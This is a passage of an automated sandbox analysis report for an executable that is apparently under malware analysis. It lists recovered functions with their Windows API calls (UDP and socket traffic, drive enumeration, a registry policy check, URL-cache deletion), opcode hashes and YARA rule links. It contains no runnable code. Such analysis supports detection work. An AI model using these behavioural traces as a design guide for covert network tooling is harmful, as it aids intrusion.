Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 3ac2f8f5af7b0d3c40b8ef892d708a394eff8d7b565022b2108cc4f7acf51177
Instruction ID: a453b5b0d0ea6fd4c501cc83d62b7a74cd48d0bc9ee55fa6e36116878b1ddbe7
Opcode Fuzzy Hash: 3ac2f8f5af7b0d3c40b8ef892d708a394eff8d7b565022b2108cc4f7acf51177
Instruction Fuzzy Hash: D231D1722012059BC710AFB5ED8CAE7B7A8FB44314F04863EE55AD3280DB78A4449BA9

Function 0040ED01 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
SysFreeString.OLEAUT32(00000000), ref: 0040EDF7

Strings

device, xrefs: 0040ED73
deviceType, xrefs: 0040ED86

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: device$deviceType
API String ID: 1602765415-3511266565
Opcode ID: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
Instruction ID: 82367b585ef85f09a19fbcbd702cec43aacbd83c2379c0e5ae25b899a50ddae9
Opcode Fuzzy Hash: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
Instruction Fuzzy Hash: F1313970A0020ADFCB14CF99D884BEFB7B5FF88304F108969E514A7390D778AA91CB95

Function 0040EBA1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
SysFreeString.OLEAUT32(00000000), ref: 0040EC97

Strings

serviceType, xrefs: 0040EC26
service, xrefs: 0040EC13

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: service$serviceType
API String ID: 1602765415-3667235276
Opcode ID: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
Instruction ID: b0af1682f63206834f838cc0e71cdea1734b5e967c65deefb948a4066f0743c7
Opcode Fuzzy Hash: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
Instruction Fuzzy Hash: 09312874A0420A9FDB04CF99C884BEFB7B5BF48304F108969E615B7390D779AA81CB95

Function 004077F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8), ref: 0040786D
Sleep.KERNEL32(000003E8), ref: 0040789C
wsprintfA.USER32 ref: 004078C7
DeleteUrlCacheEntry.WININET(?), ref: 004078D7
Sleep.KERNEL32(000DBBA0), ref: 0040791F

Strings

%s%s, xrefs: 004078BB

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: Sleep$CacheDeleteEntrywsprintf
String ID: %s%s
API String ID: 1447977647-3252725368
Opcode ID: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
Instruction ID: a96cc5071c69656b1b6f4b00c6699880e4d6530ea1aa1078cf67c052952084b8
Opcode Fuzzy Hash: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
Instruction Fuzzy Hash: 643116B0C01218DFCB50DFA8DC887EDBBB4BB48304F1085AAE609B6290D7795AC4CF59

Function 004063E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 004063E6
RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
RegCloseKey.ADVAPI32(?), ref: 0040647E

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406427
NoDrives, xrefs: 00406458

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: CloseDrivesLogicalOpenQueryValue
String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
API String ID: 2666887985-3471754645
Opcode ID: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
Instruction ID: 87cba227ccd7b938b07588cb79f30f32aa16a0fd6c84a7572e83495dfcaef010
Opcode Fuzzy Hash: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
Instruction Fuzzy Hash: D311FCB0E0020A9BDB10CFD0D945BEEBBB4BB08304F118119E615B7280D7B85685CF99

Function 0040DBE0 Relevance: 9.1, APIs: 6, Instructions: 80threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04

Part of subcall function 0040DCD0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040DD10
Part of subcall function 0040DCD0: CloseHandle.KERNEL32(?), ref: 0040DD29

CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
String ID:
API String ID: 2251373460-0
Opcode ID: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
Instruction ID: 271f69a92097b1b74c70525479ef463fb32d1143369d808ec26f6a45d53993ac
Opcode Fuzzy Hash: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
Instruction Fuzzy Hash: 8D31FA74A00208EFDB04DF98D889B9E7BB5EF48314F0085A8E906A7391D774EA95CF94

Function 00407720 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00407726
srand.MSVCRT ref: 0040772D
rand.MSVCRT ref: 00407735
Sleep.KERNEL32 ref: 00407746
StrChrA.SHLWAPI(00000000,0000007C), ref: 0040776C
Sleep.KERNEL32(000003E8), ref: 0040779D

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: Sleep$CountTickrandsrand
String ID:
API String ID: 3488799664-0
Opcode ID: c4b67ad1fad57f8bcb632e0803aeb8977b8bb7c39f14d193e10d0355081e485a
Instruction ID: d526f444081091d18ff5343ef40ffd9a09f2c1e6f6858c3ecb06089bc02b22b2
Opcode Fuzzy Hash: c4b67ad1fad57f8bcb632e0803aeb8977b8bb7c39f14d193e10d0355081e485a
Instruction Fuzzy Hash: 1F21A479E00208FBC704DF60D885AAE7B31AB45304F10C47AE9026B381D679BA80CB56

Function 00409860 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

_allshl.NTDLL ref: 0040986D
_aullshr.NTDLL ref: 0040987E
_allshl.NTDLL ref: 004098A0
_aullshr.NTDLL ref: 004098BC
_allshl.NTDLL ref: 004098DE
_aullshr.NTDLL ref: 004098FA

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: _allshl_aullshr
String ID:
API String ID: 673498613-0
Opcode ID: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
Instruction ID: 526ada65c8064deb58b6c5f7a60763359622b06b1071bb594fb8502c37df64e6
Opcode Fuzzy Hash: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
Instruction Fuzzy Hash: C1111F32600618AB8B10EF5EC4426CABBD6EF84361B25C136FC2CDF359D634DA454BD8

Function 00401200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
htons.WS2_32(?), ref: 00401281
sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE

Strings

pdu, xrefs: 0040121D

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: ExchangeInterlockedhtonsmemcpysendto
String ID: pdu
API String ID: 2164660128-2320407122
Opcode ID: 40dba2aff78ba806bae8a6d526fcd496496bfc60c7e892d92015a678719dcbf9
Instruction ID: 05dd75d8116292c76d11c3cc90d45d23dbf78b8bb9632d9a28891a4d74dcab7a
Opcode Fuzzy Hash: 40dba2aff78ba806bae8a6d526fcd496496bfc60c7e892d92015a678719dcbf9
Instruction Fuzzy Hash: 0731B3762083009BC710DF69D880A9BBBF4AFC9714F04457EFD9897381D6349914C7AB

Function 00406360 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(?c@), ref: 0040636D
QueryDosDeviceW.KERNEL32(?c@,?,00000208), ref: 004063AC
StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 004063C4

Strings

\??\, xrefs: 004063B8
?c@, xrefs: 00406369, 004063A8, 0040636C, 004063AB

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: DeviceDriveQueryType
String ID: ?c@$\??\
API String ID: 1681518211-744975932
Opcode ID: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
Instruction ID: e6efffa98ab35b62633249d18dd791fc9affcc5f03e1fdb0b50d0aac4f7d71b0
Opcode Fuzzy Hash: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
Instruction Fuzzy Hash: 6101F474A4021CEBCB20CF55DD497DD7774AB04714F00C0BAAA06A7280D6759FD5CF99

Function 00401820 Relevance: 7.6, APIs: 5, Instructions: 116COMMON

Download Yara Rule

APIs

InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
InterlockedDecrement.KERNEL32(?), ref: 004018B1

Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
String ID:
API String ID: 3966618661-0
Opcode ID: c65f9457ed9e15c383df9cb8ba30375030b5d01632cb0b7646eecf1c4dd6c2f0
Instruction ID: 3b152336b57d45bd484518126aaa8069a8e5b95e48398e5ac574b9fb36890b51
Opcode Fuzzy Hash: c65f9457ed9e15c383df9cb8ba30375030b5d01632cb0b7646eecf1c4dd6c2f0
Instruction Fuzzy Hash: 8C41C371A00A02ABC714AB399848793F3A4BF84310F14823AE82D93391E739B855CB99

Function 0040B530 Relevance: 7.6, APIs: 5, Instructions: 74fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00419498,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B5C8
WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B5E9
FlushFileBuffers.KERNEL32(000000FF), ref: 0040B5F3
CloseHandle.KERNEL32(000000FF), ref: 0040B5FD
InterlockedExchange.KERNEL32(00418068,0000003D), ref: 0040B60A

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
String ID:
API String ID: 442028454-0
Opcode ID: c0f818d5b91d049a7059593358482f2ff78183572484e8dabe53bdaf227b748b
Instruction ID: aa0aac53748f81abedf19fb5a839a9b424fc65f8fd88e1e284bf72488a9b2365
Opcode Fuzzy Hash: c0f818d5b91d049a7059593358482f2ff78183572484e8dabe53bdaf227b748b
Instruction Fuzzy Hash: EE314CB8E00208EBCB10DF94DC55FAEB7B1FB48304F208569E51167390C775AE41CB9A

Function 00409440 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

_allshl.NTDLL ref: 0040944E
_allshl.NTDLL ref: 0040945D
_allshl.NTDLL ref: 0040946C
_allshl.NTDLL ref: 0040947B
_allshl.NTDLL ref: 0040948A

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: _allshl
String ID:
API String ID: 435966717-0
Opcode ID: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
Instruction ID: d897fcd8a6e9f4a7bfe0dcf07208541f34cf8f45c30d72ee7b1e381ef02b65f1
Opcode Fuzzy Hash: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
Instruction Fuzzy Hash: D2F03672D015289B9710FEEF84424CAFBE59F89354B21C176F818E3360E6709E0946F1

Function 00401330 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C

Part of subcall function 0040AB60: HeapFree.KERNEL32(?,00000000,00402612,?,00402612,?), ref: 0040ABBB

Strings

pdu, xrefs: 00401339

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: CloseEventFreeHandleHeapObjectSingleWait
String ID: pdu
API String ID: 309973729-2320407122
Opcode ID: b5e20e1ff81c8238d4906aefd24b36edb0459e4a4963a0916b72258a76a9c2c1
Instruction ID: d5c9189d357da9e52bb83819b3173fb4210b6dfc4c93b70417a9898bc2e8bd9b
Opcode Fuzzy Hash: b5e20e1ff81c8238d4906aefd24b36edb0459e4a4963a0916b72258a76a9c2c1
Instruction Fuzzy Hash: 3D0186765003109BCB20AF66ECC4E9B7779AF48711B044679FD056B396C738E85087A9

Function 00401100 Relevance: 6.1, APIs: 4, Instructions: 86synchronizationCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 0040112B
recvfrom.WS2_32 ref: 0040119C
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
String ID:
API String ID: 3980219359-0
Opcode ID: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
Instruction ID: daf299aa3b87b71fb70ff151311bbfa052327c8c190f043936f27822c7d74034
Opcode Fuzzy Hash: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
Instruction Fuzzy Hash: 1621C3B1504301AFD304DF65DC84A6BB7E9EF88314F004A3EF559A6290E774D94887EA

Function 00401F50 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON

Download Yara Rule

APIs

GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
WSAGetLastError.WS2_32 ref: 00401FB9
GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
String ID:
API String ID: 2074799992-0
Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA

Function 00401C50 Relevance: 6.1, APIs: 4, Instructions: 59networksleepCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: Recv$ErrorLastSleep
String ID:
API String ID: 3668019968-0
Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6

Function 00401AE0 Relevance: 6.0, APIs: 4, Instructions: 49networksleepCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
WSAGetLastError.WS2_32 ref: 00401B12
Sleep.KERNEL32(00000001), ref: 00401B28
WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: Send$ErrorLastSleep
String ID:
API String ID: 2121970615-0
Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A

Function 0040DE90 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 0040DEA9
CloseHandle.KERNEL32(?), ref: 0040DED8
LeaveCriticalSection.KERNEL32(?), ref: 0040DEE7
DeleteCriticalSection.KERNEL32(?), ref: 0040DEF4

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: CriticalSection$CloseDeleteEnterHandleLeave
String ID:
API String ID: 3102160386-0
Opcode ID: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
Instruction ID: ac11750a047aba6f79e7b8cc85f80e728fdbf261864cbbb5073f4aff0768140e
Opcode Fuzzy Hash: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
Instruction Fuzzy Hash: 65115E74D00208EBDB08DF94D984A9DBB75FF48309F1081A9E806AB341D734EE94DB89

Function 004017A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterExchangeInterlocked
String ID:
API String ID: 2223660684-0
Opcode ID: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
Instruction ID: dfa7cd44099aa032f197b32b6ae0ce93fcebf173881def012ca395fa41330849
Opcode Fuzzy Hash: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
Instruction Fuzzy Hash: BD01F7356423049FC3209F26EC44ADB77F8AF49712B04443EE50693650DB34F545DB28

Function 00407390 Relevance: 6.0, APIs: 4, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,?,?,004083D7), ref: 00407398
SysAllocString.OLEAUT32(00419288), ref: 004073A3
CoUninitialize.OLE32 ref: 004073C8

